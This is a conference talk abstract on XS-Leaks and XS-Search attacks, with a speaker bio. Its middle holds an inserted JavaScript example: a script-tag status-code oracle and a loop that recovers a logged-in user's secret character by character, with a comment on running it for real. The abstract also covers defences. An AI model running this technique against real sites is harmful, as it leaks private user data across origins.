XS-Leaks: Client-Side Attacks in a Post-XSS World
12-09, 10:00–10:15 (Europe/London), Rookie track

The web platform's openness and composability provide many benefits. Yet, the ability for websites to interact with each other has provided many opportunities for attacks that abuse the core principles of the web.

With the evolution of web frameworks and browsers, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) have become increasingly rare. In response, researchers have found new ways to reveal sensitive information about users, giving rise to a new class of vulnerabilities known as XS-Leaks.

XS-Leaks abuse interactions between websites to leak sensitive information about users. Among other things, this includes leaking the user's browsing history, leaking the content of a cross-site page, and leaking response status codes in order to de-anonymize a user on the web. In certain cases, this allows a cross-origin site to perform an XS-Search: the attacker issues search queries against the victim's authenticated session, extends the query one character at a time, and uses a cross-site oracle (such as whether the response was a hit or a miss) to recover secret content character by character, instead of having to guess it whole.

For example, an HTML injection that falls short of XSS can still be weaponized to leak the response status codes of API endpoints, and the browser's behaviour as a URL approaches its maximum length can be used to detect whether a cross-site request was answered with a 302 redirect.
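As an added example (this is not code from the talk), the following puts the two ideas above together: a status-code oracle built from script-element error events, and an XS-Search loop that uses it to recover a secret one character at a time. The target URL, the `q` parameter, the charset and the secret value are assumptions chosen for illustration; the simulated server stands in for the cross-site endpoint so the block runs offline in Node.

```javascript
// Added example (not from the talk): an XS-Search driven by the "error events"
// status-code oracle. The target URL, parameter name, charset and the secret
// value below are assumptions chosen for illustration.

// Browser-side oracle. Loading a cross-site URL as a <script> resource leaks its
// HTTP status even though the body stays opaque: a 2xx fires `load`, a 4xx/5xx
// fires `error`. Requires the victim's cookies to be sent (SameSite=None) and
// the response not to be blocked by CORB/ORB or Cross-Origin-Resource-Policy.
// Browser-only; the offline demo below does not call it.
function browserStatusOracle(url) {
  return new Promise((resolve) => {
    const el = document.createElement('script');
    el.onload = () => { el.remove(); resolve(true); };
    el.onerror = () => { el.remove(); resolve(false); };
    el.src = url;
    document.head.appendChild(el);
  });
}

// Generic XS-Search driver. The oracle answers "did this URL return a hit?";
// each round extends the recovered prefix by the first character that still
// matches, so the cost is O(len(secret) * |charset|) requests, not |charset|^len.
async function xsSearch(oracle, buildUrl, charset, maxLen) {
  let prefix = '';
  let requests = 0;
  for (let i = 0; i < maxLen; i++) {
    let next = null;
    for (const c of charset) {
      requests++;
      if (await oracle(buildUrl(prefix + c))) { next = c; break; }
    }
    if (next === null) break; // no single-character extension matches: done
    prefix += next;
  }
  return { secret: prefix, requests };
}

// Constructed stand-in for the victim's search endpoint so the example runs
// offline: 200 when the logged-in user's note starts with ?q=, 404 otherwise.
// This prefix-match-or-404 behaviour is what makes a search endpoint
// XS-Searchable in the first place.
const SECRET_NOTE = 'token-7f3a'; // constructed sample data
function simulatedServer(url) {
  const q = new URL(url).searchParams.get('q') ?? '';
  return SECRET_NOTE.startsWith(q) ? 200 : 404;
}
async function simulatedOracle(url) {
  return simulatedServer(url) === 200;
}

// Assumed target endpoint and parameter name.
const buildUrl = (q) =>
  `https://victim.example/api/notes/search?q=${encodeURIComponent(q)}`;
const CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789-';

// Runs the attack against the simulated endpoint; swap in browserStatusOracle
// to run it for real from an attacker-controlled page.
async function runDemo() {
  return xsSearch(simulatedOracle, buildUrl, CHARSET, 32);
}

runDemo().then((r) =>
  console.log(`recovered "${r.secret}" in ${r.requests} requests`));
```

The oracle is the only browser-specific part; everything else is a plain search over a boolean function, which is why the same driver works with any XS-Leak that distinguishes hit from miss (status code, frame count, cache timing). On the defensive side, the same split shows where the mitigations the talk covers bite: SameSite cookies and Fetch Metadata (`Sec-Fetch-Site`) checks stop the victim's session from being attached to the probe, while `Cross-Origin-Resource-Policy` and CORB/ORB stop the status from reaching the attacker's page even when it is.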

In this talk, we will explore various XS-Leak techniques that exist in 2023, their mitigations, and some bypasses.

Zayne is a Computer Science student at the University of Cambridge. He is an avid security researcher and CTF player. He holds industry certifications such as the OSWE and OSCP, and has previously worked on TikTok's security team. In his free time, he hunts for bugs on the HackerOne platform and plays CTFs with Blue Water, one of the top global CTF teams.

Previous talks he has given include HTTP Request Smuggling in the Multiverse of Parsing Flaws at BSides Singapore 2022.